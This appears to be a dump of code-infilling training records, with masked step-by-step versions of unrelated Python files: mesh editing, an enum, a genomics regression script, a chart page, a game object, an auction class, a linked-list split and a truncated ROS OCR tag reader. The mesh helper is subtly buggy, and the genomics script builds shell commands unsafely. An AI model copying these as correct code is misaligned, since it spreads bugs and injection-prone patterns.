"step-5": "from __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\n\n\n__all__ = [\n 'mesh_add_vertex_to_face_edge'\n]\n\n\ndef mesh_add_vertex_to_face_edge(mesh, key, fkey, v):\n \"\"\"Add an existing vertex of the mesh to an existing face.\n\n Parameters\n ----------\n mesh : compas.datastructures.Mesh\n The mesh data structure.\n key : hashable\n The identifier of the vertex.\n fkey : hashable\n The identifier of the face.\n v : hashable\n The identifier of the vertex before which the new vertex should be added.\n\n Notes\n -----\n The algorithm is merely there for convenience.\n It does not check if the resulting mesh is still valid.\n\n Examples\n --------\n Consider the following points and one face definition and the resulting mesh.\n\n >>> points = [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [1.0, 1.0, 0.0], [0.0, 1.0, 0.0], [0.5, 0.0, 0.0]]\n >>> faces = [[0, 1, 2, 3]]\n >>> mesh = Mesh.from_vertices_and_faces(points, faces)\n >>> mesh.number_of_vertices()\n 5\n >>> mesh.number_of_faces()\n 1\n >>> mesh.face_degree(0)\n 4\n >>> mesh.vertex_degree(4)\n 0\n\n To add the isolated vertex to the single mesh face\n\n >>> mesh_add_vertex_to_face_edge(mesh, 4, 0, 0, 1)\n >>> mesh.face_degree(0)\n 5\n >>> mesh.vertex_degree(4)\n 2\n\n \"\"\"\n vertices = mesh.face_vertices(fkey)\n i = vertices.index(v)\n u = vertices[i - 1]\n vertices.insert(key, i - 1)\n mesh.halfedge[u][key] = fkey\n mesh.halfedge[key][v] = fkey\n if u not in mesh.halfedge[key]:\n mesh.halfedge[key][u] = None\n if key not in mesh.halfedge[v]:\n mesh.halfedge[v][key] = None\n del mesh.halfedge[u][v]\n if u in mesh.halfedge[v]:\n del mesh.halfedge[v][u]\n if (u, v) in mesh.edgedata:\n del mesh.edgedata[u, v]\n if (v, u) in mesh.edgedata:\n del mesh.edgedata[v, u]\n\n\n# ==============================================================================\n# Main\n# ==============================================================================\n\nif __name__ == \"__main__\":\n pass\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from enum import Enum
class ImageTaggingChoice(str, Enum):
Disabled = "disabled",
Basic = "basic",
Enhanced = "enhanced",
UnknownFutureValue = "unknownFutureValue",
|
normal
|
{
"blob_id": "e3fe77867926d9d82963c8125048148de6998e2b",
"index": 4374,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass ImageTaggingChoice(str, Enum):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass ImageTaggingChoice(str, Enum):\n Disabled = 'disabled',\n Basic = 'basic',\n Enhanced = 'enhanced',\n UnknownFutureValue = 'unknownFutureValue',\n",
"step-4": "from enum import Enum\n\n\nclass ImageTaggingChoice(str, Enum):\n Disabled = 'disabled',\n Basic = 'basic',\n Enhanced = 'enhanced',\n UnknownFutureValue = 'unknownFutureValue',\n",
"step-5": "from enum import Enum\n\nclass ImageTaggingChoice(str, Enum):\n Disabled = \"disabled\",\n Basic = \"basic\",\n Enhanced = \"enhanced\",\n UnknownFutureValue = \"unknownFutureValue\",\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import pandas as pd
import subprocess
import statsmodels.api as sm
import numpy as np
import math
'''
This function prcesses the gene file
Output is a one-row file for a gene
Each individual is in a column
Input file must have rowname
gene: gene ENSG ID of interest
start_col: column number which the gene exp value starts
gene_col: column name for the gene column
gene_start_col: column name for the gene start position
chr_col: column name for the gene chromosome
'''
def process_input(gene_file, vcf_file, cov_file, gene, start_col, gene_col, chr_col, gene_start_col):
all_gene = pd.read_csv(gene_file, sep='[\t,]', header=0) #sep='[\t,]' allows read in both , and tab delimited files'''
gene=all_gene.loc[all_gene[gene_col]==gene,]
gene_start=int(gene.loc[:,gene_start_col])
chrom=int(gene.loc[:,chr_col])
gene=gene.iloc[:,start_col:gene.shape[1]]
start=int(gene_start-1e6)
if start < 0:start = 0
end=int(start+1e6)
cmd='tabix '+ vcf_file + ' ' + str(chrom) + ':' + str(start) + '-' + str(end)
s = subprocess.check_output(cmd, shell=True)
s = s.decode().strip()
s = s.split('\n')
gt=[]
for i in s:
gt.append(i.split('\t'))
s1=pd.DataFrame(gt)
info=s1.iloc[:,0:9]
s1=s1.drop([0,1,2,3,4,5,6,7,8],axis=1)
s1.index=info.iloc[:,2]
s2= pd.DataFrame()
for i in s1.columns:
s2[i] = s1[i].apply(lambda x: x.split(':')[1])
sample_ids = subprocess.check_output('/usr/local/bin/bcftools query -l {}'.format(vcf_file), shell=True).decode().strip().split()
s2.columns=sample_ids
s3=s2[gene.columns]
cov = pd.read_csv(cov_file, sep='\t', index_col=0, header=0)
cov=cov[gene.columns]
return gene, s3, cov
'''This function takes the input from the previous function
Fit linear model
Return beta and pvalues for the SNPs
'''
def lm_res(snps,gene,cov):
res = pd.DataFrame(np.zeros([snps.shape[0],2], dtype=np.float32))
res.index=snps.index
res.columns=['beta','pval']
for i in range(snps.shape[0]):
X=pd.concat([snps.iloc[i,].T, cov.T], axis=1)
X = X.apply(pd.to_numeric)
X = sm.add_constant(X)
est = sm.OLS(pd.to_numeric(gene.T.iloc[:,0]), X).fit()
res.iloc[i,0]=est.params[1]
res.iloc[i,1]=est.pvalues[1]
return res
|
normal
|
{
"blob_id": "2f64aac7032ac099870269659a84b8c7c38b2bf0",
"index": 8385,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef lm_res(snps, gene, cov):\n res = pd.DataFrame(np.zeros([snps.shape[0], 2], dtype=np.float32))\n res.index = snps.index\n res.columns = ['beta', 'pval']\n for i in range(snps.shape[0]):\n X = pd.concat([snps.iloc[i,].T, cov.T], axis=1)\n X = X.apply(pd.to_numeric)\n X = sm.add_constant(X)\n est = sm.OLS(pd.to_numeric(gene.T.iloc[:, 0]), X).fit()\n res.iloc[i, 0] = est.params[1]\n res.iloc[i, 1] = est.pvalues[1]\n return res\n",
"step-3": "<mask token>\n\n\ndef process_input(gene_file, vcf_file, cov_file, gene, start_col, gene_col,\n chr_col, gene_start_col):\n all_gene = pd.read_csv(gene_file, sep='[\\t,]', header=0)\n gene = all_gene.loc[all_gene[gene_col] == gene,]\n gene_start = int(gene.loc[:, gene_start_col])\n chrom = int(gene.loc[:, chr_col])\n gene = gene.iloc[:, start_col:gene.shape[1]]\n start = int(gene_start - 1000000.0)\n if start < 0:\n start = 0\n end = int(start + 1000000.0)\n cmd = 'tabix ' + vcf_file + ' ' + str(chrom) + ':' + str(start\n ) + '-' + str(end)\n s = subprocess.check_output(cmd, shell=True)\n s = s.decode().strip()\n s = s.split('\\n')\n gt = []\n for i in s:\n gt.append(i.split('\\t'))\n s1 = pd.DataFrame(gt)\n info = s1.iloc[:, 0:9]\n s1 = s1.drop([0, 1, 2, 3, 4, 5, 6, 7, 8], axis=1)\n s1.index = info.iloc[:, 2]\n s2 = pd.DataFrame()\n for i in s1.columns:\n s2[i] = s1[i].apply(lambda x: x.split(':')[1])\n sample_ids = subprocess.check_output('/usr/local/bin/bcftools query -l {}'\n .format(vcf_file), shell=True).decode().strip().split()\n s2.columns = sample_ids\n s3 = s2[gene.columns]\n cov = pd.read_csv(cov_file, sep='\\t', index_col=0, header=0)\n cov = cov[gene.columns]\n return gene, s3, cov\n\n\n<mask token>\n\n\ndef lm_res(snps, gene, cov):\n res = pd.DataFrame(np.zeros([snps.shape[0], 2], dtype=np.float32))\n res.index = snps.index\n res.columns = ['beta', 'pval']\n for i in range(snps.shape[0]):\n X = pd.concat([snps.iloc[i,].T, cov.T], axis=1)\n X = X.apply(pd.to_numeric)\n X = sm.add_constant(X)\n est = sm.OLS(pd.to_numeric(gene.T.iloc[:, 0]), X).fit()\n res.iloc[i, 0] = est.params[1]\n res.iloc[i, 1] = est.pvalues[1]\n return res\n",
"step-4": "import pandas as pd\nimport subprocess\nimport statsmodels.api as sm\nimport numpy as np\nimport math\n<mask token>\n\n\ndef process_input(gene_file, vcf_file, cov_file, gene, start_col, gene_col,\n chr_col, gene_start_col):\n all_gene = pd.read_csv(gene_file, sep='[\\t,]', header=0)\n gene = all_gene.loc[all_gene[gene_col] == gene,]\n gene_start = int(gene.loc[:, gene_start_col])\n chrom = int(gene.loc[:, chr_col])\n gene = gene.iloc[:, start_col:gene.shape[1]]\n start = int(gene_start - 1000000.0)\n if start < 0:\n start = 0\n end = int(start + 1000000.0)\n cmd = 'tabix ' + vcf_file + ' ' + str(chrom) + ':' + str(start\n ) + '-' + str(end)\n s = subprocess.check_output(cmd, shell=True)\n s = s.decode().strip()\n s = s.split('\\n')\n gt = []\n for i in s:\n gt.append(i.split('\\t'))\n s1 = pd.DataFrame(gt)\n info = s1.iloc[:, 0:9]\n s1 = s1.drop([0, 1, 2, 3, 4, 5, 6, 7, 8], axis=1)\n s1.index = info.iloc[:, 2]\n s2 = pd.DataFrame()\n for i in s1.columns:\n s2[i] = s1[i].apply(lambda x: x.split(':')[1])\n sample_ids = subprocess.check_output('/usr/local/bin/bcftools query -l {}'\n .format(vcf_file), shell=True).decode().strip().split()\n s2.columns = sample_ids\n s3 = s2[gene.columns]\n cov = pd.read_csv(cov_file, sep='\\t', index_col=0, header=0)\n cov = cov[gene.columns]\n return gene, s3, cov\n\n\n<mask token>\n\n\ndef lm_res(snps, gene, cov):\n res = pd.DataFrame(np.zeros([snps.shape[0], 2], dtype=np.float32))\n res.index = snps.index\n res.columns = ['beta', 'pval']\n for i in range(snps.shape[0]):\n X = pd.concat([snps.iloc[i,].T, cov.T], axis=1)\n X = X.apply(pd.to_numeric)\n X = sm.add_constant(X)\n est = sm.OLS(pd.to_numeric(gene.T.iloc[:, 0]), X).fit()\n res.iloc[i, 0] = est.params[1]\n res.iloc[i, 1] = est.pvalues[1]\n return res\n",
"step-5": "import pandas as pd\nimport subprocess\nimport statsmodels.api as sm\nimport numpy as np\nimport math\n\n'''\nThis function prcesses the gene file\nOutput is a one-row file for a gene\nEach individual is in a column\n\nInput file must have rowname\ngene: gene ENSG ID of interest\nstart_col: column number which the gene exp value starts\ngene_col: column name for the gene column\ngene_start_col: column name for the gene start position\nchr_col: column name for the gene chromosome\n'''\ndef process_input(gene_file, vcf_file, cov_file, gene, start_col, gene_col, chr_col, gene_start_col):\n all_gene = pd.read_csv(gene_file, sep='[\\t,]', header=0) #sep='[\\t,]' allows read in both , and tab delimited files'''\n gene=all_gene.loc[all_gene[gene_col]==gene,]\n \n gene_start=int(gene.loc[:,gene_start_col])\n chrom=int(gene.loc[:,chr_col])\n gene=gene.iloc[:,start_col:gene.shape[1]]\n \n start=int(gene_start-1e6)\n if start < 0:start = 0\n end=int(start+1e6)\n\n cmd='tabix '+ vcf_file + ' ' + str(chrom) + ':' + str(start) + '-' + str(end)\n s = subprocess.check_output(cmd, shell=True)\n s = s.decode().strip()\n s = s.split('\\n')\n gt=[]\n for i in s:\n gt.append(i.split('\\t')) \n s1=pd.DataFrame(gt)\n info=s1.iloc[:,0:9]\n s1=s1.drop([0,1,2,3,4,5,6,7,8],axis=1)\n s1.index=info.iloc[:,2]\n\n s2= pd.DataFrame()\n for i in s1.columns:\n s2[i] = s1[i].apply(lambda x: x.split(':')[1])\n\n sample_ids = subprocess.check_output('/usr/local/bin/bcftools query -l {}'.format(vcf_file), shell=True).decode().strip().split()\n s2.columns=sample_ids\n s3=s2[gene.columns]\n\n cov = pd.read_csv(cov_file, sep='\\t', index_col=0, header=0) \n cov=cov[gene.columns]\n\n return gene, s3, cov\n\n'''This function takes the input from the previous function\n Fit linear model \n Return beta and pvalues for the SNPs\n'''\ndef lm_res(snps,gene,cov):\n res = pd.DataFrame(np.zeros([snps.shape[0],2], dtype=np.float32))\n res.index=snps.index\n res.columns=['beta','pval'] \n\n for i in range(snps.shape[0]):\n X=pd.concat([snps.iloc[i,].T, cov.T], axis=1)\n X = X.apply(pd.to_numeric)\n X = sm.add_constant(X)\n est = sm.OLS(pd.to_numeric(gene.T.iloc[:,0]), X).fit()\n res.iloc[i,0]=est.params[1]\n res.iloc[i,1]=est.pvalues[1] \n return res\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import cgi
import os
import math
import sys
from datetime import datetime
sys.path.append(os.path.join(os.path.dirname(__file__), 'pygooglechart-0.2.1'))
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from pygooglechart import PieChart3D
from LPData import Totals
from LPData import T_Shirts
import render
def stacked_vertical():
total = Totals.get_or_insert('total')
if len(total.shirts) == 0:
shirts = sorted(T_Shirts, key= lambda shirt: shirt[0])
for shirt in shirts:
total.shirts.append(shirt[0])
total.votes.append(0)
votes = []
shirts = []
i = 0
while i < len(total.votes):
if total.votes[i] != 0:
votes.append(total.votes[i])
shirts.append('Design %s' % total.shirts[i])
i += 1
if len(votes) == 0:
return ''
chart = PieChart3D(650, 300)
chart.add_data(votes)
chart.set_pie_labels(shirts)
return chart.get_url()
class GraphPage(webapp.RequestHandler):
def get(self):
render.header(self)
render.body(self, 'graph.html', {'chart' : stacked_vertical()})
render.footer(self)
application = webapp.WSGIApplication([('/graph', GraphPage)], debug=True)
def main():
run_wsgi_app(application)
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "d8c9e1098dde9d61341ebc3c55eada5592f4b71a",
"index": 2891,
"step-1": "<mask token>\n\n\ndef stacked_vertical():\n total = Totals.get_or_insert('total')\n if len(total.shirts) == 0:\n shirts = sorted(T_Shirts, key=lambda shirt: shirt[0])\n for shirt in shirts:\n total.shirts.append(shirt[0])\n total.votes.append(0)\n votes = []\n shirts = []\n i = 0\n while i < len(total.votes):\n if total.votes[i] != 0:\n votes.append(total.votes[i])\n shirts.append('Design %s' % total.shirts[i])\n i += 1\n if len(votes) == 0:\n return ''\n chart = PieChart3D(650, 300)\n chart.add_data(votes)\n chart.set_pie_labels(shirts)\n return chart.get_url()\n\n\nclass GraphPage(webapp.RequestHandler):\n\n def get(self):\n render.header(self)\n render.body(self, 'graph.html', {'chart': stacked_vertical()})\n render.footer(self)\n\n\n<mask token>\n\n\ndef main():\n run_wsgi_app(application)\n\n\n<mask token>\n",
"step-2": "<mask token>\nsys.path.append(os.path.join(os.path.dirname(__file__), 'pygooglechart-0.2.1'))\n<mask token>\n\n\ndef stacked_vertical():\n total = Totals.get_or_insert('total')\n if len(total.shirts) == 0:\n shirts = sorted(T_Shirts, key=lambda shirt: shirt[0])\n for shirt in shirts:\n total.shirts.append(shirt[0])\n total.votes.append(0)\n votes = []\n shirts = []\n i = 0\n while i < len(total.votes):\n if total.votes[i] != 0:\n votes.append(total.votes[i])\n shirts.append('Design %s' % total.shirts[i])\n i += 1\n if len(votes) == 0:\n return ''\n chart = PieChart3D(650, 300)\n chart.add_data(votes)\n chart.set_pie_labels(shirts)\n return chart.get_url()\n\n\nclass GraphPage(webapp.RequestHandler):\n\n def get(self):\n render.header(self)\n render.body(self, 'graph.html', {'chart': stacked_vertical()})\n render.footer(self)\n\n\n<mask token>\n\n\ndef main():\n run_wsgi_app(application)\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\nsys.path.append(os.path.join(os.path.dirname(__file__), 'pygooglechart-0.2.1'))\n<mask token>\n\n\ndef stacked_vertical():\n total = Totals.get_or_insert('total')\n if len(total.shirts) == 0:\n shirts = sorted(T_Shirts, key=lambda shirt: shirt[0])\n for shirt in shirts:\n total.shirts.append(shirt[0])\n total.votes.append(0)\n votes = []\n shirts = []\n i = 0\n while i < len(total.votes):\n if total.votes[i] != 0:\n votes.append(total.votes[i])\n shirts.append('Design %s' % total.shirts[i])\n i += 1\n if len(votes) == 0:\n return ''\n chart = PieChart3D(650, 300)\n chart.add_data(votes)\n chart.set_pie_labels(shirts)\n return chart.get_url()\n\n\nclass GraphPage(webapp.RequestHandler):\n\n def get(self):\n render.header(self)\n render.body(self, 'graph.html', {'chart': stacked_vertical()})\n render.footer(self)\n\n\napplication = webapp.WSGIApplication([('/graph', GraphPage)], debug=True)\n\n\ndef main():\n run_wsgi_app(application)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import cgi\nimport os\nimport math\nimport sys\nfrom datetime import datetime\nsys.path.append(os.path.join(os.path.dirname(__file__), 'pygooglechart-0.2.1'))\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom pygooglechart import PieChart3D\nfrom LPData import Totals\nfrom LPData import T_Shirts\nimport render\n\n\ndef stacked_vertical():\n total = Totals.get_or_insert('total')\n if len(total.shirts) == 0:\n shirts = sorted(T_Shirts, key=lambda shirt: shirt[0])\n for shirt in shirts:\n total.shirts.append(shirt[0])\n total.votes.append(0)\n votes = []\n shirts = []\n i = 0\n while i < len(total.votes):\n if total.votes[i] != 0:\n votes.append(total.votes[i])\n shirts.append('Design %s' % total.shirts[i])\n i += 1\n if len(votes) == 0:\n return ''\n chart = PieChart3D(650, 300)\n chart.add_data(votes)\n chart.set_pie_labels(shirts)\n return chart.get_url()\n\n\nclass GraphPage(webapp.RequestHandler):\n\n def get(self):\n render.header(self)\n render.body(self, 'graph.html', {'chart': stacked_vertical()})\n render.footer(self)\n\n\napplication = webapp.WSGIApplication([('/graph', GraphPage)], debug=True)\n\n\ndef main():\n run_wsgi_app(application)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import cgi\nimport os\nimport math\nimport sys\nfrom datetime import datetime\n\nsys.path.append(os.path.join(os.path.dirname(__file__), 'pygooglechart-0.2.1'))\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom pygooglechart import PieChart3D\n\nfrom LPData import Totals\nfrom LPData import T_Shirts\nimport render\n\ndef stacked_vertical():\n total = Totals.get_or_insert('total')\n if len(total.shirts) == 0:\n shirts = sorted(T_Shirts, key= lambda shirt: shirt[0])\n for shirt in shirts:\n total.shirts.append(shirt[0])\n total.votes.append(0)\n \n votes = []\n shirts = []\n i = 0\n while i < len(total.votes):\n if total.votes[i] != 0:\n votes.append(total.votes[i])\n shirts.append('Design %s' % total.shirts[i])\n i += 1\n \n if len(votes) == 0:\n return ''\n \n \n chart = PieChart3D(650, 300)\n chart.add_data(votes)\n chart.set_pie_labels(shirts)\n return chart.get_url()\n \nclass GraphPage(webapp.RequestHandler):\n def get(self):\n render.header(self)\n render.body(self, 'graph.html', {'chart' : stacked_vertical()})\n render.footer(self)\n\napplication = webapp.WSGIApplication([('/graph', GraphPage)], debug=True)\n\ndef main():\n run_wsgi_app(application)\n \nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
import pygame
from pygame import Rect, Color
from pymunk import Body, Poly
from config import WIDTH, HEIGHT
class Ground:
def __init__ (self, space):
# size
self.w = WIDTH - 20
self.h = 25
# position
self.x = 10
self.y = HEIGHT - self.h
# pygame rectangle
self.rect = Rect (self.x, self.y, self.w, self.h)
self.color = Color (100, 6, 107)
# physics
self.rigidbody = Body (body_type=Body.STATIC)
self.rigidbody.position = self.x + self.w / 2, self.y
self.hitbox = Poly.create_box (self.rigidbody, (self.w, self.h))
self.hitbox.elasticity = 0
self.hitbox.mass = 1
self.hitbox.friction = 0
space.add (self.rigidbody, self.hitbox)
def update (self, dt):
return
def draw (self, window):
pygame.draw.rect (window, self.color, self.rect)
return
|
normal
|
{
"blob_id": "32fc0db68c32c2e644f9c1c2318fbeff41a0543d",
"index": 5703,
"step-1": "<mask token>\n\n\nclass Ground:\n <mask token>\n <mask token>\n\n def draw(self, window):\n pygame.draw.rect(window, self.color, self.rect)\n return\n",
"step-2": "<mask token>\n\n\nclass Ground:\n\n def __init__(self, space):\n self.w = WIDTH - 20\n self.h = 25\n self.x = 10\n self.y = HEIGHT - self.h\n self.rect = Rect(self.x, self.y, self.w, self.h)\n self.color = Color(100, 6, 107)\n self.rigidbody = Body(body_type=Body.STATIC)\n self.rigidbody.position = self.x + self.w / 2, self.y\n self.hitbox = Poly.create_box(self.rigidbody, (self.w, self.h))\n self.hitbox.elasticity = 0\n self.hitbox.mass = 1\n self.hitbox.friction = 0\n space.add(self.rigidbody, self.hitbox)\n <mask token>\n\n def draw(self, window):\n pygame.draw.rect(window, self.color, self.rect)\n return\n",
"step-3": "<mask token>\n\n\nclass Ground:\n\n def __init__(self, space):\n self.w = WIDTH - 20\n self.h = 25\n self.x = 10\n self.y = HEIGHT - self.h\n self.rect = Rect(self.x, self.y, self.w, self.h)\n self.color = Color(100, 6, 107)\n self.rigidbody = Body(body_type=Body.STATIC)\n self.rigidbody.position = self.x + self.w / 2, self.y\n self.hitbox = Poly.create_box(self.rigidbody, (self.w, self.h))\n self.hitbox.elasticity = 0\n self.hitbox.mass = 1\n self.hitbox.friction = 0\n space.add(self.rigidbody, self.hitbox)\n\n def update(self, dt):\n return\n\n def draw(self, window):\n pygame.draw.rect(window, self.color, self.rect)\n return\n",
"step-4": "import pygame\nfrom pygame import Rect, Color\nfrom pymunk import Body, Poly\nfrom config import WIDTH, HEIGHT\n\n\nclass Ground:\n\n def __init__(self, space):\n self.w = WIDTH - 20\n self.h = 25\n self.x = 10\n self.y = HEIGHT - self.h\n self.rect = Rect(self.x, self.y, self.w, self.h)\n self.color = Color(100, 6, 107)\n self.rigidbody = Body(body_type=Body.STATIC)\n self.rigidbody.position = self.x + self.w / 2, self.y\n self.hitbox = Poly.create_box(self.rigidbody, (self.w, self.h))\n self.hitbox.elasticity = 0\n self.hitbox.mass = 1\n self.hitbox.friction = 0\n space.add(self.rigidbody, self.hitbox)\n\n def update(self, dt):\n return\n\n def draw(self, window):\n pygame.draw.rect(window, self.color, self.rect)\n return\n",
"step-5": "import pygame\nfrom pygame import Rect, Color\n\nfrom pymunk import Body, Poly\n\nfrom config import WIDTH, HEIGHT\n\nclass Ground:\n\n def __init__ (self, space):\n \n # size\n self.w = WIDTH - 20\n self.h = 25\n\n # position\n self.x = 10\n self.y = HEIGHT - self.h\n\n # pygame rectangle\n self.rect = Rect (self.x, self.y, self.w, self.h)\n self.color = Color (100, 6, 107)\n\n # physics\n self.rigidbody = Body (body_type=Body.STATIC)\n self.rigidbody.position = self.x + self.w / 2, self.y\n\n self.hitbox = Poly.create_box (self.rigidbody, (self.w, self.h))\n self.hitbox.elasticity = 0\n self.hitbox.mass = 1\n self.hitbox.friction = 0\n\n space.add (self.rigidbody, self.hitbox)\n\n\n def update (self, dt):\n return\n\n\n\n def draw (self, window):\n \n pygame.draw.rect (window, self.color, self.rect)\n\n return",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from auction_type import AuctionType
from bid import Bid
class Auction(object):
def __init__(self, name, type, status, start_price, buy_now_price):
self.name = name
self.type = type
self.status = status
if AuctionType.BID == type:
self.start_price = start_price
self.bids = []
if AuctionType.BUY_NOW == type:
self.buy_now_price = buy_now_price
def add_bid(self, price):
self.bids.append(Bid(price))
|
normal
|
{
"blob_id": "9e05f883d80d7583c9f7e16b2fb5d3f67896388d",
"index": 5629,
"step-1": "<mask token>\n\n\nclass Auction(object):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Auction(object):\n\n def __init__(self, name, type, status, start_price, buy_now_price):\n self.name = name\n self.type = type\n self.status = status\n if AuctionType.BID == type:\n self.start_price = start_price\n self.bids = []\n if AuctionType.BUY_NOW == type:\n self.buy_now_price = buy_now_price\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Auction(object):\n\n def __init__(self, name, type, status, start_price, buy_now_price):\n self.name = name\n self.type = type\n self.status = status\n if AuctionType.BID == type:\n self.start_price = start_price\n self.bids = []\n if AuctionType.BUY_NOW == type:\n self.buy_now_price = buy_now_price\n\n def add_bid(self, price):\n self.bids.append(Bid(price))\n",
"step-4": "from auction_type import AuctionType\nfrom bid import Bid\n\n\nclass Auction(object):\n\n def __init__(self, name, type, status, start_price, buy_now_price):\n self.name = name\n self.type = type\n self.status = status\n if AuctionType.BID == type:\n self.start_price = start_price\n self.bids = []\n if AuctionType.BUY_NOW == type:\n self.buy_now_price = buy_now_price\n\n def add_bid(self, price):\n self.bids.append(Bid(price))\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def splitListToParts(self, root, k):
"""
:type root: ListNode
:type k: int
:rtype: List[ListNode]
"""
if not root:
return [None]*k
res,p,q,n = [None]*k,root,root,0
while p:
p,n = p.next,n+1
per_len,per = 1 if n/k==0 else n/k,1
extra_count,index = 0 if n<=k else n%k,0
#print "per_len-->"+str(per_len)+" extra_count-->"+str(extra_count)
per_link_start = q
while q:
if per==per_len:
tmp = q.next
if extra_count:
p,tmp.next = tmp.next,None
tmp,extra_count = p,extra_count-1
else:
q.next = None
res[index],q,index = per_link_start,tmp,index+1
per_link_start = tmp
per = 1
continue
q,per = q.next,per+1
#print "cur PER -->"+str(per)
return res
|
normal
|
{
"blob_id": "6a609c91122f8b66f57279cff221ee76e7fadb8c",
"index": 7059,
"step-1": "# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n\tdef splitListToParts(self, root, k):\n\t\t\"\"\"\n\t\t:type root: ListNode\n\t\t:type k: int\n\t\t:rtype: List[ListNode]\n\t\t\"\"\"\n\t\tif not root:\n\t\t\treturn [None]*k\n\t\tres,p,q,n = [None]*k,root,root,0\n\t\twhile p:\n\t\t\tp,n = p.next,n+1\n\t\tper_len,per = 1 if n/k==0 else n/k,1\n\t\textra_count,index = 0 if n<=k else n%k,0\t\n\t\t\n\t\t#print \"per_len-->\"+str(per_len)+\" extra_count-->\"+str(extra_count)\n\t\tper_link_start = q\n\t\twhile q:\n\t\t\tif per==per_len:\n\t\t\t\ttmp = q.next\n\t\t\t\tif extra_count:\n\t\t\t\t\tp,tmp.next = tmp.next,None\n\t\t\t\t\ttmp,extra_count = p,extra_count-1\n\t\t\t\telse:\n\t\t\t\t\tq.next = None\n\t\t\t\tres[index],q,index = per_link_start,tmp,index+1\n\t\t\t\tper_link_start = tmp\n\t\t\t\tper = 1\n\t\t\t\tcontinue\n\t\t\tq,per = q.next,per+1\n\t\t\t#print \"cur PER -->\"+str(per)\n\t\treturn res",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/env python
import rospy
import numpy as np
from sensor_msgs.msg import Image
import cv2, cv_bridge
from geometry_msgs.msg import Twist, Pose2D
from std_msgs.msg import String
import pytesseract as ocr
from PIL import Image as imagePil
import os
import time
from roseli.srv import CreateMap, CreateMapRequest
from roseli.srv import TagImage, TagImageResponse
from roseli.srv import ResetEnc, ResetEncRequest
from dynamic_reconfigure.server import Server
from roseli.cfg import ocr_tagConfig
class ReadTag:
def __init__(self):
self.bridge = cv_bridge.CvBridge()
self.twist=Twist()
self.image_server = rospy.Service('/cropTag', TagImage, self.image_callback) #/cropTag
self.cmd_vel_pub = rospy.Publisher('cmd_vel', Twist, queue_size=1)
self.range_param = Server(ocr_tagConfig, self.reconfigure)
self.string = String()
self._pose2d_ = Pose2D()
self.rate = rospy.Rate(1)
def reconfigure(self, config, level):
#print(config)
self.min_h = config.min_hue_ocr
self.min_s = config.min_saturation_ocr
self.min_v = config.min_value_ocr
self.max_h = config.max_hue_ocr
self.max_s = config.max_saturation_ocr
self.max_v = config.max_value_ocr
return config
def creating_map_client(self, pose2d, ip):
rospy.wait_for_service('/pose2D')
try:
create_map = rospy.ServiceProxy('/pose2D', CreateMap)
resp = CreateMapRequest(pose2d, ip)
return create_map(resp)
except rospy.ServiceException, e:
print "Service call failed: %s"%e
def reset_enc_func(self):
rospy.wait_for_service('/reset_enc_server')
try:
reset = rospy.ServiceProxy('/reset_enc_server', ResetEnc)
resp = ResetEncRequest()
return reset(resp)
except rospy.ServiceException, e:
print "Service call failed: %s"%e
def image_callback (self, msg):
self.twist.linear.x = 0
self.twist.angular.z = 0
self.cmd_vel_pub.publish(self.twist)
self.rate.sleep()
try:
img = self.bridge.imgmsg_to_cv2(msg.tag, "bgr8")
except cv_bridge.CvBridgeError as e:
print ("Error: Imagem da Tag nao recebida")
print(e)
lowerBound1=np.array([self.min_h, self.min_s, self.min_v]) #lower boundary of the HSV image
upperBound1=np.array([self.max_h, self.max_s, self.max_v]) #Upper boundary of the HSV image
img_HSV=cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
imgThresholder=cv2.inRange(img_HSV,lowerBound1,upperBound1,1)
cv2.imshow('picamera', img)
cv2.waitKey(500)
kernel = np.ones((3, 3), np.uint8)
imgFilter=cv2.morphologyEx(imgThresholder, cv2.MORPH_DILATE, kernel)
#imgFilter=cv2.adaptiveThreshold(imgThresholder, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 1)
cv2.imshow('window_tag', imgFilter)
cv2.waitKey(500)
#cv2.destroyAllWindows()
#cv2.waitKey(1000)
filename = "{}.png".format(os.getpid())
cv2.imwrite(filename, imgFilter)
text = ocr.image_to_string(imagePil.open(filename),config="-c tessedit_char_whitelist=1234567890.")
os.remove(filename)
print(text)
separated= text.split(' ')
if (not len(separated) == 3):
print("It doesn't read a tag!")
return TagImageResponse()
else:
self._pose2d_.x = float(separated[0])
self._pose2d_.y = float(separated[1])
self._pose2d_.theta = float(separated[2])
_resp_ = self.creating_map_client(self._pose2d_, 0)
flag = self.reset_enc_func()
self.twist.linear.x = 0.3
self.twist.angular.z = 0
for x in range(0, 10):
self.cmd_vel_pub.publish(self.twist)
